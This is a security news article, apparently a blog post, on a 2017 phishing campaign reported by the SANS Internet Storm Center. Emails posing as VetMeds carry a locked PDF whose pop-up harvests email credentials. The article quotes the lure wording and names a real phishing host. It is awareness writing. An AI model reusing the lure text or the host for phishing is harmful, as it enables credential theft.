Just Wednesday, on the 4th of January (2017), a post warning about the new PDF-based phishing scam was published on the official website of the Internet Storm Center (ISC). The latter program is being administered by the SANS Technology Institute and it has been established to monitor the malicious cyber activities, especially, those, which belong to the category of massive attacks and breaches. This very article was a response to the recent spam campaign carried out in the States, involving the malicious PDF attachments.
In this certain case of a phishing campaign of the malicious spam e-mails, the attachment is not infected with any kind of malware. Well, at least in this initial phase of the attack. This campaign is primarily targeted at pumping out the e-mail addresses, as well as their login credentials from the victims.
The malign e-mail is said to be sent from VetMeds and its subject line is Assessment document. The e-mail is added a PDF attachment, which is locked. The message below the file is PDF Secure File UNLOCK to Access File Content:
The word UNLOCK in the message is, actually, a link. If a user clicks the link to unlock the content of the file, he is presented with the latter:
The file is opened with a default viewer, however, the full viewing of the document is prevented by the dialog pop-up, wanting you to enter your e-mail address and password:
Inattentive users may enter their credentials and make them available for the cyber crooks, as everything you enter in those two fields provided get leaked to them. Once the e-mail and login details are available for the crooks, they can develop the attack further.
In addition to this, the content of the PDF file holds another incongruence. Even though the theme of the e-mail itself is VetMeds assessment, the contents of the file presents it as the documentation from SWIFT (Society for Worldwide Interbank Financial Telecommunication). Precisely, it is introduced as a SWIFT banking transaction.
You will be shown the security warning before the PDF reader opens the file with the blocking pop-up asking for you to enter your e-mail credentials:
The text of the warning is:
The document is trying to connect to:
http://chai.myjino.ru
Do you trust myjino.ru? If you do not trust the
site, choose Block.
However, if you are using Windows 10 and the Microsoft Edge browser, you will not be popped up the above security alert, as Windows 10 uses its browser as the default PDF reader.
To be on the safe side, you should listen to the general recommendation not to open spam e-mails. But if you do this regardless, know that files are not typical to be unlocked by entering your e-mail or other sensitive credentials. Moreover, if the subject of the e-mail and the contents of its body or the contents of the attachment are strangely contradictory, read this as a warning sign to keep away from the attachment added.
Sources: threatpost.com and isc.sans.edu.
